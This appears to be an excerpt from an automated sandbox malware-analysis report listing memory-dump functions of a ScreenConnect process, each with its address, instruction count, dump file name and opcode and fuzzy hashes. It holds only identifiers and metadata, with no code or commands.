Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddb778cacbfb9e06125a78198a01a9275935bbe0483ee9e5afa0cedf8feb8968
Instruction ID: e3af6c86ab905f1cfbc60d9d256522e8854fbe8e9349149f20daa18870033a08
Opcode Fuzzy Hash: ddb778cacbfb9e06125a78198a01a9275935bbe0483ee9e5afa0cedf8feb8968
Instruction Fuzzy Hash: 8901F4B22092809FD306CF28C8A4D917FB5EF8A21470541EBE840CB332C635ED0ACB50

Function 042DF920 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f39ff390054797388d979c6dfb2fad8d4744c670a274f8a808fbdeae7de017a0
Instruction ID: 96ea918fa699f8bb0e5080677e70e80599b851e8ad0235c956b19b3b9640be2d
Opcode Fuzzy Hash: f39ff390054797388d979c6dfb2fad8d4744c670a274f8a808fbdeae7de017a0
Instruction Fuzzy Hash: B501F4727013045FE709AB79D890A66BBE6FFC9214714817AE409DBB61DA31EC12CBD0

Function 042DCB6D Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1d196f44a7d53859760e9437f08547bd8401bfe83592693412cec18a5e6176
Instruction ID: fb6dee1ee670a525c347a157162793409d50d4939f505d52b8ed7d92f573a003
Opcode Fuzzy Hash: 8a1d196f44a7d53859760e9437f08547bd8401bfe83592693412cec18a5e6176
Instruction Fuzzy Hash: 8FF0B46261F3C11FEB13027958166C42FB4CF43254B4E04EBD08ACB1A3D4085C4B8361

Function 042DCBA0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ea2e01dd08d5f684e8eefcfd843660a41221696f63074fc1b610f2076dac09
Instruction ID: 1f37f9b416f278ca84f0de5befc29d0ca7e993b2728b3eeca8785287900c508e
Opcode Fuzzy Hash: 41ea2e01dd08d5f684e8eefcfd843660a41221696f63074fc1b610f2076dac09
Instruction Fuzzy Hash: C6F0303736455507DB20299FB4157EE635DCFC0776B04407BF60EDA684DA5AE892C2A0

Function 042DEE11 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b19a252a8ceb93626ae1568c1851530dfc17f2590525c444fd82c5b9a90709
Instruction ID: 29f922a641644ddd84d6c7b455e7ab16613fc2170623f51378ab47725bf59b81
Opcode Fuzzy Hash: 52b19a252a8ceb93626ae1568c1851530dfc17f2590525c444fd82c5b9a90709
Instruction Fuzzy Hash: C7F08C36604346AFEB10CE68CC40BAB3765EF80264F14812AFD18CB240CB30EA96C790

Function 042DFB61 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad2c4f07e855f8296719e0fe118426f8cfb69af8776a8c1a4ef90464d694cf4
Instruction ID: 3b8755fdcef04af7e7d349e2fe816081ad7f6b2a5884ab384f8a2fc6847a7e55
Opcode Fuzzy Hash: 1ad2c4f07e855f8296719e0fe118426f8cfb69af8776a8c1a4ef90464d694cf4
Instruction Fuzzy Hash: 46F08C35A001149FCB00DBA8C801ADEBBF6EF88210F1440A5E509E7320DB35A906CBA1

Function 042DF930 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0670e4f40712b0f28671586a0aedfc2b06c251dfa05b644d845aad47b27203c7
Instruction ID: db90f2752e681e0dbf2ba8ef8967e243460945b929db38aea8c3901d2f16fd1e
Opcode Fuzzy Hash: 0670e4f40712b0f28671586a0aedfc2b06c251dfa05b644d845aad47b27203c7
Instruction Fuzzy Hash: 43F062757002046BE708AB7AD990A6ABADAFBC9254B14813AE509D7B14DA31EC128BD4

Function 00BE6461 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6d69e5ab13a214480a52a40474d3762096718b7c2bc5d2801d55c73fcc2d858
Instruction ID: ca673dff25ce0a9f72cf7b98074b9da0da96254f40033f049c5d5e7d4c609923
Opcode Fuzzy Hash: f6d69e5ab13a214480a52a40474d3762096718b7c2bc5d2801d55c73fcc2d858
Instruction Fuzzy Hash: 7EF0C2323042005FC710DBACE88499EBBF5EF953A0714866AE409CB3A5DB71ED45C7A0

Function 00BE8B40 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dda17148417aaffe927e10c048b6ba784c7e4ea74ef496ef507ab270e019b9ea
Instruction ID: c6c4cbb75d1086da6272752681b9db5132dfbfe0d97e4377e660e1b1d873b46f
Opcode Fuzzy Hash: dda17148417aaffe927e10c048b6ba784c7e4ea74ef496ef507ab270e019b9ea
Instruction Fuzzy Hash: 9D012C32D0015DDBCF04DFA9D9448CDBBB6EF89314F0585A6E505BB254DB306956CBA0

Function 042DE0A0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76b5b7565d55e8e1d4f714560f20447ba16ac25740a24b77d565c5c5911f6166
Instruction ID: 35be3a07fc3538889723421dffc5863fd3e29061fa42e140f6d4e6866b85ff63
Opcode Fuzzy Hash: 76b5b7565d55e8e1d4f714560f20447ba16ac25740a24b77d565c5c5911f6166
Instruction Fuzzy Hash: 94F06D767002146BE704EB6AD890A1BB7DAFBC8354B20813AE10DD7B55DA31AC1287E4

Function 042DAF50 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7d261c56a6625cee19d55de3aa4e0abe6a055dec68d3ad45f5def051a239c4
Instruction ID: 0939bd8ccd66afdff0f7cd569496a50b19dd529a652671de62014812b873f24c
Opcode Fuzzy Hash: 1b7d261c56a6625cee19d55de3aa4e0abe6a055dec68d3ad45f5def051a239c4
Instruction Fuzzy Hash: 50F0F6763004159F8304DF29E548C5ABBAAEFD962132581AAE509CB335CB31EC16CB90

Function 042DAA70 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b2e47a7bc60312726b18a00b3f65d8df4dfd23242d3192b5342dd4ff1bd04fc
Instruction ID: fd14e41271a95de16dae07062b09dfb670fc01848319f2d0199b26572947a8c6
Opcode Fuzzy Hash: 9b2e47a7bc60312726b18a00b3f65d8df4dfd23242d3192b5342dd4ff1bd04fc
Instruction Fuzzy Hash: 17F0C8362046509FC7258B35D49489ABBF1EFC9225315857AE98A87722CE31EC02CB60

Function 00BEF630 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675335c0a9babc77cd56c6b46d0311c42afd001b66b40a5e9a547dca079e171c
Instruction ID: 99268766bcd2d923e542c947da1bdb7ccc24ab56c2dac3dd40db6b1400c4a93b
Opcode Fuzzy Hash: 675335c0a9babc77cd56c6b46d0311c42afd001b66b40a5e9a547dca079e171c
Instruction Fuzzy Hash: 4FF09C363041456FCF059F9898549EF3FB7EB88364B04402AF545D7251CB3149119765

Function 00BEBC60 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3df1167aced6208875160b280c4c362518fbd315e19e1592dda8b9df708e8355
Instruction ID: f5cb1d3ea4dfdf71b08e37475b60d8d6270c8d1b993123da2b1a908385347644
Opcode Fuzzy Hash: 3df1167aced6208875160b280c4c362518fbd315e19e1592dda8b9df708e8355
Instruction Fuzzy Hash: 5F01A9B254C1918BC705CBACFC88AC5BBE0EF61365F5405AED5858B205E7395543CB81

Function 00BEBCC8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d557b17f73ce907afffda1dd78ef75c788340a0a056222b40cecf803a9332dc1
Instruction ID: d99534046c50a952454aa95c246cddf1c60e2a3197200323ef43ff8cfd148ae7
Opcode Fuzzy Hash: d557b17f73ce907afffda1dd78ef75c788340a0a056222b40cecf803a9332dc1
Instruction Fuzzy Hash: 57F05836B0D2145AD728CABAA400A9BBBDACBD8624B1480BFE58DC3740E931A8018765

Function 042DAAC9 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc59d180b735bc7d0bc1ebd335f1e3b997ede79ab90c030a14239721337643d2
Instruction ID: ca4ae420e8a3225e34659b26042196e8b21a7194c52429b01ee8b1e3b6302b9c
Opcode Fuzzy Hash: fc59d180b735bc7d0bc1ebd335f1e3b997ede79ab90c030a14239721337643d2
Instruction Fuzzy Hash: CBF0BB353052105FD7119B39D894CABBBF5EFC9224314817AE94EC7761CA309C01C751

Function 042D63F4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1d5eb680443711fd468eee9738d8179d4f9f3fa1e311893f89d145e99d6de7
Instruction ID: cf819d7578a454c0fff018a144b16efaece542668a5c1bab435d6dd6aaaa06b6
Opcode Fuzzy Hash: 8c1d5eb680443711fd468eee9738d8179d4f9f3fa1e311893f89d145e99d6de7
Instruction Fuzzy Hash: D901E83471020AEFDB14DF94E898EADBBB2FF49345F158558F502AB2A1C770A842DF50

Function 00BEF640 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde86c8f3ee4a53d495a1de41e6433dfe4d89b34c3bab7e39f02887475bfeacb
Instruction ID: d6e940458154d9be9c5df4d9252cec88b53b522f55c93341c28a22b09e0e811a
Opcode Fuzzy Hash: dde86c8f3ee4a53d495a1de41e6433dfe4d89b34c3bab7e39f02887475bfeacb
Instruction Fuzzy Hash: DCF089373002196F8F059E99A8409AF3BABEBC8360B00442AF609D3351DB318D1197A5

Function 00BE6470 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 830432066d02c52471954e1289a20ad3b28a8a5fb7654d0f86423b9947833cee
Instruction ID: 0e7f87a51ad3ab5a3f29317575bfb6c2e9bb50153b66efb2c0a9a63b67d89126
Opcode Fuzzy Hash: 830432066d02c52471954e1289a20ad3b28a8a5fb7654d0f86423b9947833cee
Instruction Fuzzy Hash: 16F05E323002145F8B10EAADE84495EBBE9DF857B0310862AF419CB394DB71ED4587A0

Function 00BED4E8 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70de1242d76d07a6c3e9884b7cca9ce1cf9d26a8f907dc712dfb131123670cd3
Instruction ID: 83bf97b0b3a3594bb3268af78d0fd7f6d2be72eff6e563218d6daf36a4db0de3
Opcode Fuzzy Hash: 70de1242d76d07a6c3e9884b7cca9ce1cf9d26a8f907dc712dfb131123670cd3
Instruction Fuzzy Hash: 46F05E323042055FC710DA6DE844D5BBBE9DF883B4310863AF419CB3A4EB71ED4587A0

Function 00BEFA08 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c6615bf919c21609196d709cc57ecba85c05bbace498e97078763d697f5009d
Instruction ID: 8ab8b09d3eb1a3619a4ca129ae7793c88d0fde51e2e0c98c331c7c0c71ca510f
Opcode Fuzzy Hash: 5c6615bf919c21609196d709cc57ecba85c05bbace498e97078763d697f5009d
Instruction Fuzzy Hash: C5F082B1740201AB87109B6FBA5096BBBDEEBD4750304847AE16ACB354EF61EC0647A0

Function 042DD2A0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce564a07aeef5e68802b1d377e006653d0a8dbdf274d5b499f878ff8e0302e2b
Instruction ID: 20c1f5630ea732e92d4acd44e732aeafcb912161075032e8470e261ed2febbfa
Opcode Fuzzy Hash: ce564a07aeef5e68802b1d377e006653d0a8dbdf274d5b499f878ff8e0302e2b
Instruction Fuzzy Hash: A4F09031215681CFEB165B34C9185593B65EF8A31132940AAD846CB1B2CF35ED43C7A0

Function 042DD866 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a6495bb370fe78fd314cbf7bfe1eaddb182f40ccb0290a716f0d19142173f3
Instruction ID: c99ae4f9d87f163ddd04a2c09ba13a95467d4b6d0c81e1d2fcd662a99df328d9
Opcode Fuzzy Hash: 97a6495bb370fe78fd314cbf7bfe1eaddb182f40ccb0290a716f0d19142173f3
Instruction Fuzzy Hash: F6F0A939F105069F8B44DF59D4948ADF7B2EF89224B24C066E949E7314D631ED12CB91

Function 042DFB70 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a39473f2f529589078ccb5a6a6f814d3f69c67163607177f2c2dcacb73fd87
Instruction ID: 58030e25bc5dea7ca10065064e75c6e9c6732fe493bd0fa07cb9f706baf1ce39
Opcode Fuzzy Hash: 02a39473f2f529589078ccb5a6a6f814d3f69c67163607177f2c2dcacb73fd87
Instruction Fuzzy Hash: E7F03075B002149FDB04DFA9C904D9EBBF6EF88610B1180A9E509E7370E731AE15CB91

Function 00BEE260 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f08504078d08ed1343c5337ca45862fbbc91599c89ba12cbce191af8702fab5
Instruction ID: 9b4a4841ac13d2ab245d6a4d182429789038f030a1121573748ee09f2de8da0f
Opcode Fuzzy Hash: 9f08504078d08ed1343c5337ca45862fbbc91599c89ba12cbce191af8702fab5
Instruction Fuzzy Hash: 90F0C971D001159FCB41DFADC841AADBBF1EF88300B248166E818E7211E331AA12CF80

Function 00BE31E0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe43e610b3b487dca3c06944fcac7201abed2a5a4f54362703258eeb5772553
Instruction ID: 91fa7771670896a42a7301601f9f3623f156bc78af76cf169b2a5b8fc34a821f
Opcode Fuzzy Hash: abe43e610b3b487dca3c06944fcac7201abed2a5a4f54362703258eeb5772553
Instruction Fuzzy Hash: 5AF03730905288EFCF80EBA9D98669CBFF1EB05741F2481E9C106A7651D7356B44DB51

Function 042D61D8 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b71c223d4cd05c75a7c97f071781bcd0a8b9fe2f20d32da3b0a9c493ca329e9
Instruction ID: 2646d67a8b26e0ea4d79b48428f0449af686323d7cb03934c53fc04a194af2d0
Opcode Fuzzy Hash: 5b71c223d4cd05c75a7c97f071781bcd0a8b9fe2f20d32da3b0a9c493ca329e9
Instruction Fuzzy Hash: 6BF0A032B082505FDB05ABAD640845ABFF9DFCA26431680ABE40DD7352E924EC0687E2

Function 00BEA9A1 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1358504c8137d5c7f28f7b219a0e3d538acda53fac97b7a1c5bcdf2718540450
Instruction ID: edfb2042e8c665532dd7a8c5fcce204a41e2021d8e0eb68f8b7ef7b06fbe2718
Opcode Fuzzy Hash: 1358504c8137d5c7f28f7b219a0e3d538acda53fac97b7a1c5bcdf2718540450
Instruction Fuzzy Hash: D0F0A73250D1D11FC7124B7968687E63FA8DFC2269B1901E7E088C7103C5155C17CB94

Function 00BE329C Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8868f26727f64aeaa78c0ce4f030ae187962f77a00b297ed843b08c4a0e376fb
Instruction ID: 4ca7fc111b82effe767bda047df19c17d8ab71039f422301abee49c741bc3e78
Opcode Fuzzy Hash: 8868f26727f64aeaa78c0ce4f030ae187962f77a00b297ed843b08c4a0e376fb
Instruction Fuzzy Hash: EEF0F6331082904FC712C768F85669D7FE1EE8235074945EBD042CB666C758EA09C352

Function 00BEAA48 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfdb348e9a882be55f972024d78bb25d67a6c90bd89cdf790f1167a55de67760
Instruction ID: 2df6b55c723d52f936f9bdcc024702537b7cdb4fb91dcc2fec1a48595b6a5069
Opcode Fuzzy Hash: dfdb348e9a882be55f972024d78bb25d67a6c90bd89cdf790f1167a55de67760
Instruction Fuzzy Hash: A7F0A0363043404FCB14AFAAB8C876A7BE6EBC8B65B14412EE50AC7305CE7048078B50

Function 00BE31F0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e330819995ecde93e970d312a6e28784660a76946f7d8e19e71f415a40556b88
Instruction ID: f18cf8b9c498875a2a8215bec79ca762f6a835dd4d4d9bd9f8d68c8621ba3ec0
Opcode Fuzzy Hash: e330819995ecde93e970d312a6e28784660a76946f7d8e19e71f415a40556b88
Instruction Fuzzy Hash: EAF0E230E0028CEFCB84EBE8D58A69CBBF2EB44741F2080A9D546A7254DB306F84CB51

Function 00BEF93F Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d9f1e3eb28b34f5b667d552973d3d9d2c11db847b5cf1037b3c641156dd81c
Instruction ID: 5fe109f8922c0886db29495c94d6f42acd0346e115f45468d7bf773b405d66be
Opcode Fuzzy Hash: f1d9f1e3eb28b34f5b667d552973d3d9d2c11db847b5cf1037b3c641156dd81c
Instruction Fuzzy Hash: 68F0ED32B062004FC314DB2EE8A4AD6B7A9EBC9399F20047AE409C3356CA758C038B40

Function 042DD097 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf219fd247e9c11b98df1acd6a696a537d710e4524cdd2e979464f26f3e4b3b4
Instruction ID: 3ff428b3c3cdaf7e7a805a7745b7312e9f6208ba8e3e5ee2dd90728f427bbe00
Opcode Fuzzy Hash: bf219fd247e9c11b98df1acd6a696a537d710e4524cdd2e979464f26f3e4b3b4
Instruction Fuzzy Hash: 67F01C763112408FD759DB78D858C567BB5EF8A62931505EAE146CB632CA30EC06C790

Function 042DAA80 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3517477133.00000000042D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_42d0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f8b4412b580445500fc2051297faea257d5cee573f5e8337aea2660836f19f
Instruction ID: 5123a5467c7553d67186dabe19991582fe1f3f0491dd5578df5f3d6068349fb1
Opcode Fuzzy Hash: 33f8b4412b580445500fc2051297faea257d5cee573f5e8337aea2660836f19f
Instruction Fuzzy Hash: C3F08C363002149FC3249B3AD484C5BFBEAEFC9235314847EE94A87321CA36EC41CBA0

Function 00BEE2AA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2f3f8db1efe3d029092a0bf77bd25bbd6faaf30012939c9522f68977c3256a5
Instruction ID: d19ee48d0b57598c91bf02c8fb538152055f014ec6612ed89406cc6ebed7c386
Opcode Fuzzy Hash: c2f3f8db1efe3d029092a0bf77bd25bbd6faaf30012939c9522f68977c3256a5
Instruction Fuzzy Hash: 98F05E30B001548FC715DF6DD554AAEB7E5EF88350B04C0A9E819CB368DB38DD11CB95

Function 00BEEBA0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a75889b5d8ae5947cc3f76318a61f3d4d5de511728e698896e410d57a360783
Instruction ID: f455c7d531f45863c1598eddd7cf982b958c7f168c50266e40c75d52a3c23caf
Opcode Fuzzy Hash: 0a75889b5d8ae5947cc3f76318a61f3d4d5de511728e698896e410d57a360783
Instruction Fuzzy Hash: 29E039767042486B4B04CA5AD840D6BBBEAEBC8360B14C06AF919CB315DA35DD128BA4

Function 00BE1229 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_be0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13c8667452391903293a408881d6bb6a31c697a5ba4cdcd98ac6512498eea9cd
Instruction ID: dc4ae0c3e462090fb593be4b53fc1c581d2075256a4ff78b107cac5c485e52ff
Opcode Fuzzy Hash: 13c8667452391903293a408881d6bb6a31c697a5ba4cdcd98ac6512498eea9cd
Instruction Fuzzy Hash: 8BF0E5326082804FC701A7B9A95949F7FA2CFC63113148ABFE00ACB355DF61DD0A8BE1

Function 00BEBCBA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3505052875.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

